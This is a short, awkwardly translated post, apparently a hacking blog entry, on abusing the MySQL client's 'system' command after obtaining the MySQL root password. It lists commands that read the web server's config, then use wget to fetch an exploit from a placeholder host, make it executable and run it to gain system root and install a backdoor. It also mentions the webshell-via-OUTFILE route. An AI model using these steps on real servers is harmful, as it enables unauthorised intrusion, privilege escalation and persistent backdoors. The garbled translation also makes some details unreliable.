There is a function in mysql5.x for Linux that can help us do a lot of things, this function 4. X below does not seem to have been found, and I did not check the function manual. I just wrote something in my own experience. 4. Let's take a look at the function manual tomorrow for another experiment.
MySQL 5. X introduces a system function. This function can execute system commands. when MySQL logs in as root, it can be used to execute commands, of course, within the permitted range.
Generally, after obtaining the MySQL Root Password, we connect to create a table, OUTFILE, get a webshell, and then escalate the permission. Today we use another method.
According to the above method, we need to know the absolute path of the web. Of course, this is not easy to find. Some sqlinjection may be displayed when an error is reported, but some may not be. However, according to my method, there is no need to find the web path and directly execute
Mysql> system VI/etc/httpd/CONF/httpd. conf;
In this way, we can find the web path. Of course, our goal is not to find the web path and put webshell in. We want to do other things, such as downloading exp and executing, obtaining root permissions, and installing backdoor Xiami.
Mysql> system wget http://xxxx.xxx.com/xxxx;
Mysql> system chmod + x xxxx;
Mysql> system./xxxx;
In this way, the root of MySQL becomes the root of the system. For the rest, if SSH is enabled, go to SSH and enter the user password of MySQL. OK.
Or, download the backdoor and install the app directly.